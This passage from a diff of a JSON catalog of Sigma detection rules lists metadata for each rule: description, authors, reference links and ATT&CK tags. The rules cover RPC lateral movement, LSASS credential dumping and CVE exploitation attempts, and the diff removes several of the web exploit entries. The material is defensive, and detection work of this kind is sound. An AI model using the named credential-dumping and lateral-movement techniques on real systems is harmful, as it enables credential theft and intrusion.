"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1053/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", + "value": "Remote Schedule Task Lateral Movement via SASec" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Actual printing" + ], + "filename": "rpc_firewall_printing_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/zeronetworks/rpcfirewall", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", + "value": "Remote Printing Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_sessions.yml", + "level": "high", + "logsource.category": "application", + 
"logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", + "https://attack.mitre.org/techniques/T1033/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", + "value": "SharpHound Recon Sessions" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate usage of remote file encryption" + ], + "filename": "rpc_firewall_efs_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", + "value": "Remote Encrypting File System Abuse" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + 
"filename": "rpc_firewall_sasec_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", + "value": "Recon Activity via SASec" + }, + { + "description": "Detects remote RPC calls to modify the registry and possible execute code", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://attack.mitre.org/techniques/T1112/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", + "value": "Remote Registry Lateral Movement" + }, + { + "description": 
"Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate remote share creation" + ], + "filename": "rpc_firewall_remote_server_service_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://attack.mitre.org/tactics/TA0008/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", + "value": "Remote Server Service Abuse" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" + ], + "tags": "No 
established tags" + }, + "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", + "value": "Remote Schedule Task Recon via AtScv" + }, + { + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_winapi_in_powershell_credentials_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "value": "Potential Credential Dumping Attempt Via PowerShell" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/27", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", + "value": "LSASS Access from Program in Suspicious Folder" + }, + { + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "value": "Lsass Memory Dump via Comsvcs DLL" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_access_win_cmstp_execution_by_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" + ], 
+ "tags": [ + "attack.defense_evasion", + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" + ] + }, + "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "value": "CMSTP Execution Process Access" + }, + { + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", + "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "value": "Load Undocumented Autoelevated COM Interface" + }, + { + "description": "Detects LSASS process access by pypykatz for credential dumping.", "meta": { "author": "Bhabesh Raj", - "creation_date": "2020/12/08", + "creation_date": "2021/08/03", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + 
"https://github.com/skelsec/pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001" ] }, - "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", - "value": "Fortinet CVE-2018-13379 Exploitation" + "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "value": "Credential Dumping by Pypykatz" }, { - "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", "meta": { - "author": "Florian Roth", - "creation_date": "2018/07/22", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2018_2894_weblogic_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/pyn3rd/status/1020620932967223296", - "https://github.com/LandGrey/CVE-2018-2894", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.t1505.003", - "cve.2018.2894" - ] - }, - "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", - "value": "Oracle WebLogic Exploit" - }, - { - "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/11/18", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.exploit-db.com/exploits/47297", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" - ], - 
"tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", - "value": "Pulse Secure Attack CVE-2019-11510" - }, - { - "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", - "meta": { - "author": "Arnim Rupp, Florian Roth", + "author": "Tim Burrell", "creation_date": "2020/01/02", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2019_19781_citrix_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "filename": "proc_access_win_invoke_phantom.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://support.citrix.com/article/CTX267679", - "https://support.citrix.com/article/CTX267027", - "https://isc.sans.edu/diary/25686", - "https://twitter.com/mpgn_x64/status/1216787131210829826", - "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/hlldz/Invoke-Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1562.002" ] }, - "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", - "value": "Citrix Netscaler Attack CVE-2019-19781" + "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "value": "Suspect Svchost Memory Asccess" }, { - "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without 
Microsoft Defender interference", "meta": { "author": "Florian Roth", - "creation_date": "2020/05/26", + "creation_date": "2022/02/10", "falsepositive": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "filename": "web_cve_2019_3398_confluence.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", - "value": "Confluence Exploitation CVE-2019-3398" - }, - { - "description": "Detects CVE-2020-0688 Exploitation attempts", - "meta": { - "author": "NVISO", - "creation_date": "2020/02/27", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_0688_exchange_exploit.yml", + "filename": "proc_access_win_lsass_memdump_evasion.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://github.com/Ridter/cve-2020-0688", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ] }, - "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", - "value": "CVE-2020-0688 
Exploitation Attempt" + "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "value": "LSASS Access from White-Listed Processes" }, { - "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", "meta": { - "author": "Florian Roth", - "creation_date": "2020/02/29", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_0688_msexchange.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", - "value": "CVE-2020-0688 Exchange Exploitation via Web Log" - }, - { - "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", - "meta": { - "author": "Bhabesh Raj, Tim Shelton", - "creation_date": "2020/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_10148_solarwinds_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://kb.cert.org/vuls/id/843464", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", - "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" - }, - { - "description": "Detects exploitation attempts on WebLogic servers", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/11/02", - "falsepositive": [ - "Unknown" - ], - "filename": 
"web_cve_2020_14882_weblogic_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://isc.sans.edu/diary/26734", - "https://twitter.com/jas502n/status/1321416053050667009?s=20", - "https://twitter.com/sudo_sudoka/status/1323951871078223874", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.14882" - ] - }, - "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", - "value": "Oracle WebLogic Exploit CVE-2020-14882" - }, - { - "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/01/25", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", - "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.28188" - ] - }, - "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", - "value": "TerraMaster TOS CVE-2020-28188" - }, - { - "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/07", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - 
"https://twitter.com/aboul3la/status/1286012324722155525", - "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.3452" - ] - }, - "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", - "value": "Cisco ASA FTD Exploit CVE-2020-3452" - }, - { - "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/05", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_5902_f5_bigip.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://support.f5.com/csp/article/K52145254", - "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", - "https://twitter.com/yorickkoster/status/1279709009151434754", - "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", - "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" - }, - { - "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/10", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - 
"https://support.citrix.com/article/CTX276688", - "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", - "https://dmaasland.github.io/posts/citrix.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", - "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" - }, - { - "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", - "https://www.tenable.com/security/research/tra-2021-13", - "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.20090", - "cve.2021.20091" - ] - }, - "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", - "value": "Arcadyan Router Exploitations" - }, - { - "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/01/20", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established 
product", - "refs": [ - "https://twitter.com/pyn3rd/status/1351696768065409026", - "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2021.2109" - ] - }, - "uuid": "687f6504-7f44-4549-91fc-f07bab065821", - "value": "Oracle WebLogic Exploit CVE-2021-2109" - }, - { - "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/02/24", - "falsepositive": [ - "OVA uploads to your VSphere appliance" - ], - "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", - "https://f5.pm/go-59627.html", - "https://swarm.ptsecurity.com/unauth-rce-vmware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", - "value": "CVE-2021-21972 VSphere Exploitation" - }, - { - "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2020/03/10", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/wugeej/status/1369476795255320580", - "https://paper.seebug.org/1495/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", 
- "cve.2021.21978" - ] - }, - "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", - "value": "CVE-2021-21978 Exploitation Attempt" - }, - { - "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/09/24", - "falsepositive": [ - "Vulnerability Scanning" - ], - "filename": "web_cve_2021_22005_vmware_file_upload.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://kb.vmware.com/s/article/85717", - "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", - "value": "VMware vCenter Server File Upload CVE-2021-22005" - }, - { - "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", - "meta": { - "author": "Bhabesh Raj, Florian Roth", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": 